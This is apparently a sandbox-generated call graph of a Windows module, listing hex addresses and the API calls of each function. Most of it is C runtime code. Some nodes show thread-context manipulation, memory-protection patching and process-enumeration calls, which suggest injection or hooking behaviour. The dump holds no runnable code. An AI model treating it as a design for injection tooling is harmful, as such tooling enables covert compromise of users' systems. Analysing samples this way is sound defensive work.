UnhandledExceptionFilter 7762->7763 7764 1fd186dce2e RtlVirtualUnwind 7762->7764 7767 1fd186dceb6 _invalid_parameter_noinfo 7763->7767 7764->7763 7768 1fd186d8070 7767->7768 7769 1fd186d8079 7768->7769 7770 1fd186d8848 IsProcessorFeaturePresent 7769->7770 7771 1fd186d8084 GetCurrentProcess TerminateProcess 7769->7771 7772 1fd186d8860 7770->7772 7777 1fd186d891c RtlCaptureContext 7772->7777 7778 1fd186d8936 RtlLookupFunctionEntry 7777->7778 7779 1fd186d894c RtlVirtualUnwind 7778->7779 7780 1fd186d8873 7778->7780 7779->7778 7779->7780 7781 1fd186d8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7780->7781 7783 1fd186dc48f 7782->7783 7784 1fd186e0001 7782->7784 7786 1fd186e0054 7783->7786 7784->7783 7790 1fd186e0a40 7784->7790 7787 1fd186e006d 7786->7787 7789 1fd186dc49f 7786->7789 7787->7789 7808 1fd186de8c4 7787->7808 7789->7715 7799 1fd186dcab0 7790->7799 7792 1fd186e0a4f 7798 1fd186e0a95 7792->7798 7807 1fd186dc558 EnterCriticalSection 7792->7807 7798->7783 7800 1fd186dcb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7799->7800 7802 1fd186dcab9 7800->7802 7801 1fd186dcabe 7801->7792 7802->7801 7803 1fd186dcae8 FlsGetValue 7802->7803 7804 1fd186dcae4 7802->7804 7803->7804 7805 1fd186dc940 _invalid_parameter_noinfo 13 API calls 7804->7805 7806 1fd186dcafe 7804->7806 7805->7806 7806->7792 7809 1fd186dcab0 _invalid_parameter_noinfo 14 API calls 7808->7809 7810 1fd186de8cd 7809->7810 7811 1fd186daaac 7812 1fd186daad9 __except_validate_context_record 7811->7812 7813 1fd186d9324 _CreateFrameInfo 9 API calls 7812->7813 7814 1fd186daade 7813->7814 7816 1fd186dabc6 7814->7816 7818 1fd186dab38 7814->7818 7826 1fd186dab8c 7814->7826 7815 1fd186dac34 7815->7826 7853 1fd186da22c 7815->7853 7822 1fd186dabe5 7816->7822 7847 1fd186d99cc 7816->7847 7819 1fd186dabb3 7818->7819 7825 1fd186dab5a __GetCurrentState 7818->7825 7818->7826 7840 1fd186d95d0 7819->7840 7822->7815 7822->7826 7850 1fd186d99e0 7822->7850 7823 1fd186dacdd 7825->7823 7828 1fd186dafb8 7825->7828 7829 1fd186d99cc Is_bad_exception_allowed 9 API calls 7828->7829 7830 1fd186dafe7 __GetCurrentState 7829->7830 7831 1fd186d9324 _CreateFrameInfo 9 API calls 7830->7831 7837 1fd186db004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7831->7837 7832 1fd186db0fb 7833 1fd186d9324 _CreateFrameInfo 9 API calls 7832->7833 7834 1fd186db100 7833->7834 7835 1fd186d9324 _CreateFrameInfo 9 API calls 7834->7835 7836 1fd186db10b __FrameHandler3::GetHandlerSearchState 7834->7836 7835->7836 7836->7826 7837->7832 7837->7836 7838 1fd186d99cc 9 API calls Is_bad_exception_allowed 7837->7838 7839 1fd186d99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 7837->7839 7838->7837 7839->7837 7910 1fd186d9634 7840->7910 7842 1fd186d95ef __FrameHandler3::FrameUnwindToEmptyState 7914 1fd186d9540 7842->7914 7845 1fd186dafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 7846 1fd186d9624 7845->7846 7846->7826 7848 1fd186d9324 _CreateFrameInfo 9 API calls 7847->7848 7849 1fd186d99d5 7848->7849 7849->7822 7851 1fd186d9324 _CreateFrameInfo 9 API calls 7850->7851 7852 1fd186d99e9 7851->7852 7852->7815 7918 1fd186db144 7853->7918 7855 1fd186da6f4 7856 1fd186da645 7856->7855 7896 1fd186da643 7856->7896 7971 1fd186da6fc 7856->7971 7857 1fd186da373 7857->7856 7859 1fd186da3ab 7857->7859 7858 1fd186d9324 _CreateFrameInfo 9 API calls 7862 1fd186da687 7858->7862 7863 1fd186da575 7859->7863 7885 1fd186d99e0 9 API calls 7859->7885 7943 1fd186da96c 7859->7943 7957 1fd186da158 7859->7957 7862->7855 7866 1fd186d8070 _invalid_parameter_noinfo 8 API calls 7862->7866 7867 1fd186da592 7863->7867 7869 1fd186d99cc Is_bad_exception_allowed 9 API calls 7863->7869 7863->7896 7864 1fd186d9324 _CreateFrameInfo 9 API calls 7865 1fd186da2da 7864->7865 7865->7862 7870 1fd186d9324 _CreateFrameInfo 9 API calls 7865->7870 7868 1fd186da69a 7866->7868 7874 1fd186da5b4 7867->7874 7867->7896 7964 1fd186d95a4 7867->7964 7868->7826 7869->7867 7872 1fd186da2ea 7870->7872 7873 1fd186d9324 _CreateFrameInfo 9 API calls 7872->7873 7875 1fd186da2f3 7873->7875 7877 1fd186da5ca 7874->7877 7874->7896 7907 1fd186da6d7 7874->7907 7929 1fd186d9a0c 7875->7929 7876 1fd186da5d5 7884 1fd186db1dc 9 API calls 7876->7884 7877->7876 7880 1fd186d99cc Is_bad_exception_allowed 9 API calls 7877->7880 7878 1fd186d9324 _CreateFrameInfo 9 API calls 7881 1fd186da6dd 7878->7881 7880->7876 7883 1fd186d9324 _CreateFrameInfo 9 API calls 7881->7883 7886 1fd186da6e6 7883->7886 7887 1fd186da5eb 7884->7887 7885->7859 7889 1fd186dc2f4 14 API calls 7886->7889 7891 1fd186d9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7887->7891 7887->7896 7888 1fd186d9324 _CreateFrameInfo 9 API calls 7890 1fd186da335 7888->7890 7889->7855 7890->7857 7893 1fd186d9324 _CreateFrameInfo 9 API calls 7890->7893 7892 1fd186da605 7891->7892 7968 1fd186d9838 RtlUnwindEx 7892->7968 7895 1fd186da341 7893->7895 7897 1fd186d9324 _CreateFrameInfo 9 API calls 7895->7897 7896->7858 7899 1fd186da34a 7897->7899 7932 1fd186db1dc 7899->7932 7903 1fd186da35e 7939 1fd186db2cc 7903->7939 7905 1fd186da6d1 7988 1fd186dc2f4 7905->7988 7907->7878 7908 1fd186da366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 7908->7905 7983 1fd186d9178 7908->7983 7912 1fd186d9662 __FrameHandler3::FrameUnwindToEmptyState 7910->7912 7911 1fd186d968c RtlLookupFunctionEntry 7911->7912 7912->7911 7913 1fd186d96d4 7912->7913 7913->7842 7915 1fd186d958b 7914->7915 7916 1fd186d9560 7914->7916 7915->7845 7916->7915 7917 1fd186d9324 _CreateFrameInfo 9 API calls 7916->7917 7917->7916 7919 1fd186db169 __FrameHandler3::FrameUnwindToEmptyState 7918->7919 7920 1fd186d9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7919->7920 7921 1fd186db17e 7920->7921 7991 1fd186d9db4 7921->7991 7924 1fd186db1b3 7926 1fd186d9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 7924->7926 7925 1fd186db190 __FrameHandler3::GetHandlerSearchState 7994 1fd186d9dec 7925->7994 7927 1fd186da28e 7926->7927 7927->7855 7927->7857 7927->7864 7930 1fd186d9324 _CreateFrameInfo 9 API calls 7929->7930 7931 1fd186d9a1a 7930->7931 7931->7855 7931->7888 7934 1fd186db2c3 7932->7934 7936 1fd186db207 7932->7936 7933 1fd186da35a 7933->7857 7933->7903 7935 1fd186d99e0 9 API calls 7935->7936 7936->7933 7936->7935 7937 1fd186d99cc Is_bad_exception_allowed 9 API calls 7936->7937 7938 1fd186da96c 9 API calls 7936->7938 7937->7936 7938->7936 7940 1fd186db339 7939->7940 7942 1fd186db2e9 Is_bad_exception_allowed 7939->7942 7940->7908 7941 1fd186d99cc 9 API calls Is_bad_exception_allowed 7941->7942 7942->7940 7942->7941 7944 1fd186da999 7943->7944 7956 1fd186daa28 7943->7956 7945 1fd186d99cc Is_bad_exception_allowed 9 API calls 7944->7945 7946 1fd186da9a2 7945->7946 7947 1fd186d99cc Is_bad_exception_allowed 9 API calls 7946->7947 7948 1fd186da9bb 7946->7948 7946->7956 7947->7948 7949 1fd186da9e7 7948->7949 7950 1fd186d99cc Is_bad_exception_allowed 9 API calls 7948->7950 7948->7956 7951 1fd186d99e0 9 API calls 7949->7951 7950->7949 7952 1fd186da9fb 7951->7952 7953 1fd186daa14 7952->7953 7954 1fd186d99cc Is_bad_exception_allowed 9 API calls 7952->7954 7952->7956 7955 1fd186d99e0 9 API calls 7953->7955 7954->7953 7955->7956 7956->7859 7958 1fd186d9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7957->7958 7959 1fd186da195 7958->7959 7960 1fd186d99cc Is_bad_exception_allowed 9 API calls 7959->7960 7961 1fd186da1cd 7960->7961 7962 1fd186d9838 9 API calls 7961->7962 7963 1fd186da211 7962->7963 7963->7859 7965 1fd186d95b8 __FrameHandler3::FrameUnwindToEmptyState 7964->7965 7966 1fd186d9540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 7965->7966 7967 1fd186d95c2 7966->7967 7967->7874 7969 1fd186d8070 _invalid_parameter_noinfo 8 API calls 7968->7969 7970 1fd186d9932 7969->7970 7970->7896 7972 1fd186da735 7971->7972 7977 1fd186da948 7971->7977 7973 1fd186d9324 _CreateFrameInfo 9 API calls 7972->7973 7974 1fd186da73a 7973->7974 7975 1fd186da759 EncodePointer 7974->7975 7982 1fd186da7ac 7974->7982 7976 1fd186d9324 _CreateFrameInfo 9 API calls 7975->7976 7978 1fd186da769 7976->7978 7977->7896 7978->7982 7997 1fd186d94ec 7978->7997 7980 1fd186d99cc 9 API calls Is_bad_exception_allowed 7980->7982 7981 1fd186da158 19 API calls 7981->7982 7982->7977 7982->7980 7982->7981 7984 1fd186d9197 7983->7984 7985 1fd186d91e2 RaiseException 7984->7985 7986 1fd186d91c0 RtlPcToFileHeader 7984->7986 7985->7905 7987 1fd186d91d8 7986->7987 7987->7985 7989 1fd186dcab0 _invalid_parameter_noinfo 14 API calls 7988->7989 7990 1fd186dc2fd 7989->7990 7992 1fd186d9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7991->7992 7993 1fd186d9dc7 7992->7993 7993->7924 7993->7925 7995 1fd186d9634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 7994->7995 7996 1fd186d9e06 7995->7996 7996->7927 7998 1fd186d9324 _CreateFrameInfo 9 API calls 7997->7998 7999 1fd186d9518 7998->7999 7999->7982 8693 1fd186e0fa8 8694 1fd186e0fcc 8693->8694 8695 1fd186d8070 _invalid_parameter_noinfo 8 API calls 8694->8695 8696 1fd186e100e 8695->8696 9111 1fd186dc828 9112 1fd186dc82d 9111->9112 9116 1fd186dc842 9111->9116 9117 1fd186dc848 9112->9117 9118 1fd186dc88a 9117->9118 9119 1fd186dc892 9117->9119 9120 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9118->9120 9121 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9119->9121 9120->9119 9122 1fd186dc89f 9121->9122 9123 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9122->9123 9124 1fd186dc8ac 9123->9124 9125 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9124->9125 9126 1fd186dc8b9 9125->9126 9127 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9126->9127 9128 1fd186dc8c6 9127->9128 9129 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9128->9129 9130 1fd186dc8d3 9129->9130 9131 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9130->9131 9132 1fd186dc8e0 9131->9132 9133 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9132->9133 9134 1fd186dc8ed 9133->9134 9135 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9134->9135 9136 1fd186dc8fd 9135->9136 9137 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9136->9137 9138 1fd186dc90d 9137->9138 9143 1fd186dc6f8 9138->9143 9157 1fd186dc558 EnterCriticalSection 9143->9157 8697 1fd186d33a8 8698 1fd186d33cf 8697->8698 8699 1fd186d349c 8698->8699 8700 1fd186d33ec PdhGetCounterInfoW 8698->8700 8700->8699 8701 1fd186d340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8700->8701 8702 1fd186d3488 GetProcessHeap HeapFree 8701->8702 8703 1fd186d3440 StrCmpW 8701->8703 8702->8699 8703->8702 8704 1fd186d3455 8703->8704 8704->8702 8705 1fd186d3950 12 API calls 8704->8705 8705->8704 9159 1fd186df820 9162 1fd186df7d8 9159->9162 9167 1fd186dc558 EnterCriticalSection 9162->9167 9168 1fd186dfe20 9169 1fd186dfe4a 9168->9169 9170 1fd186dd220 _invalid_parameter_noinfo 13 API calls 9169->9170 9171 1fd186dfe6a 9170->9171 9172 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9171->9172 9173 1fd186dfe78 9172->9173 9174 1fd186dfea2 9173->9174 9176 1fd186dd220 _invalid_parameter_noinfo 13 API calls 9173->9176 9175 1fd186dfec1 InitializeCriticalSectionEx 9174->9175 9178 1fd186dfeab 9174->9178 9175->9174 9177 1fd186dfe94 9176->9177 9179 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9177->9179 9179->9174 8202 1fd186d4320 8203 1fd186d426d 8202->8203 8204 1fd186d42bd VirtualQuery 8203->8204 8205 1fd186d42d7 8203->8205 8206 1fd186d4322 GetLastError 8203->8206 8204->8203 8204->8205 8206->8203 8706 1fd186e479d 8709 1fd186daf34 8706->8709 8710 1fd186daf9b 8709->8710 8711 1fd186daf4e 8709->8711 8711->8710 8712 1fd186d9324 _CreateFrameInfo 9 API calls 8711->8712 8712->8710 7454 1fd186d1e3c LoadLibraryA GetProcAddress 7455 1fd186d1e62 SleepEx 7454->7455 7456 1fd186d1e6f 7454->7456 7455->7455 8023 1fd186d34b8 8024 1fd186d34e8 8023->8024 8025 1fd186d35a1 8024->8025 8026 1fd186d3505 PdhGetCounterInfoW 8024->8026 8026->8025 8027 1fd186d3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8026->8027 8028 1fd186d3555 StrCmpW 8027->8028 8029 1fd186d358d GetProcessHeap HeapFree 8027->8029 8028->8029 8031 1fd186d356a 8028->8031 8029->8025 8031->8029 8032 1fd186d3950 StrCmpNW 8031->8032 8033 1fd186d3982 StrStrW 8032->8033 8034 1fd186d39f2 8032->8034 8033->8034 8035 1fd186d399b StrToIntW 8033->8035 8034->8031 8035->8034 8036 1fd186d39c3 8035->8036 8036->8034 8042 1fd186d1a30 OpenProcess 8036->8042 8043 1fd186d1ab6 8042->8043 8044 1fd186d1a64 K32GetModuleFileNameExW 8042->8044 8043->8034 8048 1fd186d3f88 8043->8048 8045 1fd186d1a7e PathFindFileNameW lstrlenW 8044->8045 8046 1fd186d1aad CloseHandle 8044->8046 8045->8046 8047 1fd186d1a9c StrCpyW 8045->8047 8046->8043 8047->8046 8049 1fd186d3f95 StrCmpNIW 8048->8049 8050 1fd186d39e4 8048->8050 8049->8050 8050->8034 8051 1fd186d1cfc 8050->8051 8052 1fd186d1d1c 8051->8052 8053 1fd186d1d13 8051->8053 8052->8034 8054 1fd186d1530 2 API calls 8053->8054 8054->8052 8055 1fd186d2ab4 TlsGetValue TlsGetValue TlsGetValue 8056 1fd186d2b0d 8055->8056 8061 1fd186d2b79 8055->8061 8058 1fd186d2b15 8056->8058 8056->8061 8057 1fd186d2b74 8058->8057 8059 1fd186d2c32 TlsSetValue TlsSetValue TlsSetValue 8058->8059 8060 1fd186d3f88 StrCmpNIW 8058->8060 8059->8057 8060->8058 8061->8057 8061->8059 8062 1fd186d3f88 StrCmpNIW 8061->8062 8062->8061 8207 1fd186dbd34 8208 1fd186dbd4d 8207->8208 8218 1fd186dbd49 8207->8218 8222 1fd186de864 8208->8222 8213 1fd186dbd6b 8248 1fd186dbda8 8213->8248 8214 1fd186dbd5f 8215 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8214->8215 8215->8218 8219 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8220 1fd186dbd92 8219->8220 8221 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8220->8221 8221->8218 8223 1fd186de871 8222->8223 8224 1fd186dbd52 8222->8224 8267 1fd186dcacc 8223->8267 8228 1fd186dedc8 GetEnvironmentStringsW 8224->8228 8226 1fd186de8a0 8272 1fd186de53c 8226->8272 8229 1fd186dedf8 8228->8229 8230 1fd186dbd57 8228->8230 8231 1fd186dece8 WideCharToMultiByte 8229->8231 8230->8213 8230->8214 8232 1fd186dee49 8231->8232 8233 1fd186dee53 FreeEnvironmentStringsW 8232->8233 8234 1fd186dc5d0 14 API calls 8232->8234 8233->8230 8235 1fd186dee63 8234->8235 8236 1fd186dee6b 8235->8236 8237 1fd186dee74 8235->8237 8238 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8236->8238 8239 1fd186dece8 WideCharToMultiByte 8237->8239 8240 1fd186dee72 8238->8240 8241 1fd186dee97 8239->8241 8240->8233 8242 1fd186dee9b 8241->8242 8243 1fd186deea5 8241->8243 8244 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8242->8244 8245 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8243->8245 8246 1fd186deea3 FreeEnvironmentStringsW 8244->8246 8245->8246 8246->8230 8249 1fd186dbdcd 8248->8249 8250 1fd186dd220 _invalid_parameter_noinfo 13 API calls 8249->8250 8263 1fd186dbe03 8250->8263 8251 1fd186dbe0b 8252 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8251->8252 8254 1fd186dbd73 8252->8254 8253 1fd186dbe6d 8255 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8253->8255 8254->8219 8255->8254 8256 1fd186dd220 _invalid_parameter_noinfo 13 API calls 8256->8263 8257 1fd186dbe92 8463 1fd186dbebc 8257->8463 8259 1fd186dc328 __std_exception_copy 38 API calls 8259->8263 8261 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8261->8251 8262 1fd186dbea6 8265 1fd186dd06c _invalid_parameter_noinfo 17 API calls 8262->8265 8263->8251 8263->8253 8263->8256 8263->8257 8263->8259 8263->8262 8264 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8263->8264 8264->8263 8266 1fd186dbeb9 8265->8266 8268 1fd186dcae8 FlsGetValue 8267->8268 8270 1fd186dcae4 8267->8270 8268->8270 8269 1fd186dcafe 8269->8226 8270->8269 8271 1fd186dc940 _invalid_parameter_noinfo 13 API calls 8270->8271 8271->8269 8295 1fd186de7ac 8272->8295 8279 1fd186de5a7 8280 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8279->8280 8292 1fd186de58e 8280->8292 8281 1fd186de5b6 8281->8281 8321 1fd186de8e0 8281->8321 8284 1fd186de6cc 8290 1fd186de70d 8284->8290 8293 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8284->8293 8285 1fd186de6b2 8286 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8285->8286 8287 1fd186de6b7 8286->8287 8288 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8287->8288 8288->8292 8289 1fd186de774 8291 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8289->8291 8290->8289 8332 1fd186de05c 8290->8332 8291->8292 8292->8224 8293->8290 8296 1fd186de7cf 8295->8296 8302 1fd186de7d9 8296->8302 8347 1fd186dc558 EnterCriticalSection 8296->8347 8303 1fd186dcacc 14 API calls 8302->8303 8306 1fd186de571 8302->8306 8304 1fd186de8a0 8303->8304 8305 1fd186de53c 56 API calls 8304->8305 8305->8306 8307 1fd186de22c 8306->8307 8348 1fd186ddd78 8307->8348 8310 1fd186de24c GetOEMCP 8312 1fd186de273 8310->8312 8311 1fd186de25e 8311->8312 8313 1fd186de263 GetACP 8311->8313 8312->8292 8314 1fd186dc5d0 8312->8314 8313->8312 8315 1fd186dc61b 8314->8315 8319 1fd186dc5df _invalid_parameter_noinfo 8314->8319 8316 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8315->8316 8318 1fd186dc619 8316->8318 8317 1fd186dc602 HeapAlloc 8317->8318 8317->8319 8318->8279 8318->8281 8319->8315 8319->8317 8320 1fd186db470 _invalid_parameter_noinfo 2 API calls 8319->8320 8320->8319 8322 1fd186de22c 16 API calls 8321->8322 8323 1fd186de91b 8322->8323 8324 1fd186dea71 8323->8324 8326 1fd186de958 IsValidCodePage 8323->8326 8331 1fd186de972 8323->8331 8325 1fd186d8070 _invalid_parameter_noinfo 8 API calls 8324->8325 8327 1fd186de6a9 8325->8327 8326->8324 8328 1fd186de969 8326->8328 8327->8284 8327->8285 8329 1fd186de998 GetCPInfo 8328->8329 8328->8331 8329->8324 8329->8331 8364 1fd186de344 8331->8364 8462 1fd186dc558 EnterCriticalSection 8332->8462 8349 1fd186ddd9c 8348->8349 8350 1fd186ddd97 8348->8350 8349->8350 8351 1fd186dcab0 _invalid_parameter_noinfo 14 API calls 8349->8351 8350->8310 8350->8311 8352 1fd186dddb7 8351->8352 8356 1fd186dffb4 8352->8356 8357 1fd186dddda 8356->8357 8358 1fd186dffc9 8356->8358 8360 1fd186e0020 8357->8360 8358->8357 8359 1fd186e0a40 _invalid_parameter_noinfo 14 API calls 8358->8359 8359->8357 8361 1fd186e0048 8360->8361 8362 1fd186e0035 8360->8362 8361->8350 8362->8361 8363 1fd186de8c4 _invalid_parameter_noinfo 14 API calls 8362->8363 8363->8361 8365 1fd186de38f GetCPInfo 8364->8365 8374 1fd186de485 8364->8374 8371 1fd186de3a2 8365->8371 8365->8374 8366 1fd186d8070 _invalid_parameter_noinfo 8 API calls 8368 1fd186de524 8366->8368 8368->8324 8375 1fd186e1474 8371->8375 8374->8366 8376 1fd186ddd78 14 API calls 8375->8376 8377 1fd186e14b6 8376->8377 8395 1fd186dec58 8377->8395 8397 1fd186dec61 MultiByteToWideChar 8395->8397 8467 1fd186dbec1 8463->8467 8468 1fd186dbe9a 8463->8468 8464 1fd186dbeea 8466 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8464->8466 8465 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8465->8467 8466->8468 8467->8464 8467->8465 8468->8261 9180 1fd186dec30 GetCommandLineA GetCommandLineW 9181 1fd186d6430 9182 1fd186d643d 9181->9182 9183 1fd186d6449 9182->9183 9190 1fd186d655a 9182->9190 9184 1fd186d64a6 SetThreadContext 9183->9184 9185 1fd186d64cd 9183->9185 9184->9185 9186 1fd186d6581 VirtualProtect FlushInstructionCache 9186->9190 9187 1fd186d663e 9188 1fd186d665e 9187->9188 9197 1fd186d4b20 9187->9197 9201 1fd186d5530 GetCurrentProcess 9188->9201 9190->9186 9190->9187 9192 1fd186d66b7 9195 1fd186d8070 _invalid_parameter_noinfo 8 API calls 9192->9195 9193 1fd186d6677 ResumeThread 9194 1fd186d6663 9193->9194 9194->9192 9194->9193 9196 1fd186d66ff 9195->9196 9199 1fd186d4b3c 9197->9199 9198 1fd186d4b9f 9198->9188 9199->9198 9200 1fd186d4b52 VirtualFree 9199->9200 9200->9199 9204 1fd186d554c 9201->9204 9202 1fd186d5562 VirtualProtect FlushInstructionCache 9202->9204 9203 1fd186d5593 9203->9194 9204->9202 9204->9203 8469 1fd186d8f0c 8476 1fd186d946c 8469->8476 8472 1fd186d8f19 8477 1fd186d9474 8476->8477 8479 1fd186d94a5 8477->8479 8480 1fd186d8f15 8477->8480 8493 1fd186d9d28 8477->8493 8481 1fd186d94b4 __vcrt_uninitialize_locks DeleteCriticalSection 8479->8481 8480->8472 8482 1fd186d9400 8480->8482 8481->8480 8498 1fd186d9bfc 8482->8498 8494 1fd186d9aac __vcrt_FlsAlloc 5 API calls 8493->8494 8495 1fd186d9d5e 8494->8495 8496 1fd186d9d68 8495->8496 8497 1fd186d9d73 InitializeCriticalSectionAndSpinCount 8495->8497 8496->8477 8497->8496 8499 1fd186d9aac __vcrt_FlsAlloc 5 API calls 8498->8499 8500 1fd186d9c21 TlsAlloc 8499->8500 9205 1fd186d820c 9212 1fd186d8f34 9205->9212 9208 1fd186d8219 9213 1fd186d9340 _CreateFrameInfo 9 API calls 9212->9213 9214 1fd186d8215 9213->9214 9214->9208 9215 1fd186dc288 9214->9215 9216 1fd186dcb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9215->9216 9217 1fd186d8222 9216->9217 9217->9208 9218 1fd186d8f48 9217->9218 9221 1fd186d92dc 9218->9221 9220 1fd186d8f51 9220->9208 9222 1fd186d9302 9221->9222 9223 1fd186d92ed 9221->9223 9222->9220 9224 1fd186d9c8c _CreateFrameInfo 6 API calls 9223->9224 9225 1fd186d92f2 9224->9225 9227 1fd186d9cd4 9225->9227 9228 1fd186d9aac __vcrt_FlsAlloc 5 API calls 9227->9228 9229 1fd186d9d02 9228->9229 9230 1fd186d9d0c 9229->9230 9231 1fd186d9d14 TlsSetValue 9229->9231 9230->9222 9231->9230 8502 1fd186d2300 8503 1fd186d2331 8502->8503 8504 1fd186d2412 8503->8504 8505 1fd186d2447 8503->8505 8511 1fd186d2355 8503->8511 8506 1fd186d244c 8505->8506 8507 1fd186d24bb 8505->8507 8519 1fd186d35c8 GetProcessHeap HeapAlloc 8506->8519 8507->8504 8510 1fd186d35c8 11 API calls 8507->8510 8509 1fd186d238d StrCmpNIW 8509->8511 8510->8504 8511->8504 8511->8509 8513 1fd186d1d30 8511->8513 8514 1fd186d1d57 GetProcessHeap HeapAlloc 8513->8514 8515 1fd186d1db4 8513->8515 8514->8515 8516 1fd186d1d92 8514->8516 8515->8511 8517 1fd186d1cfc 2 API calls 8516->8517 8518 1fd186d1d9a GetProcessHeap HeapFree 8517->8518 8518->8515 8521 1fd186d361b 8519->8521 8520 1fd186d36d9 GetProcessHeap HeapFree 8520->8504 8521->8520 8522 1fd186d36d4 8521->8522 8523 1fd186d3666 StrCmpNIW 8521->8523 8524 1fd186d1d30 6 API calls 8521->8524 8522->8520 8523->8521 8524->8521 8525 1fd186db500 8530 1fd186dc558 EnterCriticalSection 8525->8530 8713 1fd186dc180 8716 1fd186dbf38 8713->8716 8723 1fd186dbf00 8716->8723 8721 1fd186dbebc 13 API calls 8722 1fd186dbf6b 8721->8722 8724 1fd186dbf15 8723->8724 8725 1fd186dbf10 8723->8725 8727 1fd186dbf1c 8724->8727 8726 1fd186dbebc 13 API calls 8725->8726 8726->8724 8728 1fd186dbf2c 8727->8728 8729 1fd186dbf31 8727->8729 8730 1fd186dbebc 13 API calls 8728->8730 8729->8721 8730->8729 8731 1fd186e1398 8732 1fd186e13ae 8731->8732 8733 1fd186e13f5 8732->8733 8735 1fd186e140e 8732->8735 8734 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8733->8734 8736 1fd186e13fa 8734->8736 8737 1fd186ddd78 14 API calls 8735->8737 8739 1fd186e1405 8735->8739 8738 1fd186dd04c _invalid_parameter_noinfo 38 API calls 8736->8738 8737->8739 8738->8739 8531 1fd186d2518 GetProcessIdOfThread GetCurrentProcessId 8532 1fd186d2543 CreateFileW 8531->8532 8533 1fd186d25be 8531->8533 8532->8533 8534 1fd186d2577 WriteFile ReadFile CloseHandle 8532->8534 8534->8533 9232 1fd186dc218 9233 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9232->9233 9234 1fd186dc228 9233->9234 9235 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9234->9235 9236 1fd186dc23c 9235->9236 9237 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9236->9237 9238 1fd186dc250 9237->9238 9239 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9238->9239 9240 1fd186dc264 9239->9240 9241 1fd186e4611 __scrt_dllmain_exception_filter 8071 1fd186d5c8d 8073 1fd186d5c94 8071->8073 8072 1fd186d5cfb 8073->8072 8074 1fd186d5d77 VirtualProtect 8073->8074 8075 1fd186d5db1 8074->8075 8076 1fd186d5da3 GetLastError 8074->8076 8076->8075 8535 1fd186dc510 8536 1fd186dc518 8535->8536 8537 1fd186dc545 8536->8537 8539 1fd186dc574 8536->8539 8540 1fd186dc59f 8539->8540 8541 1fd186dc5a3 8540->8541 8542 1fd186dc582 DeleteCriticalSection 8540->8542 8541->8537 8542->8540 9242 1fd186db7ea 9243 1fd186dc2f4 14 API calls 9242->9243 9244 1fd186db7ef 9243->9244 9245 1fd186db815 GetModuleHandleW 9244->9245 9246 1fd186db85f 9244->9246 9245->9246 9250 1fd186db822 9245->9250 9259 1fd186db6f8 9246->9259 9250->9246 9254 1fd186db904 GetModuleHandleExW 9250->9254 9255 1fd186db938 GetProcAddress 9254->9255 9256 1fd186db94a 9254->9256 9255->9256 9257 1fd186db95b FreeLibrary 9256->9257 9258 1fd186db962 9256->9258 9257->9258 9258->9246 9271 1fd186dc558 EnterCriticalSection 9259->9271 9272 1fd186d27e8 9273 1fd186d2867 9272->9273 9274 1fd186d28c9 GetFileType 9273->9274 9286 1fd186d2998 9273->9286 9275 1fd186d28d7 StrCpyW 9274->9275 9276 1fd186d28ed 9274->9276 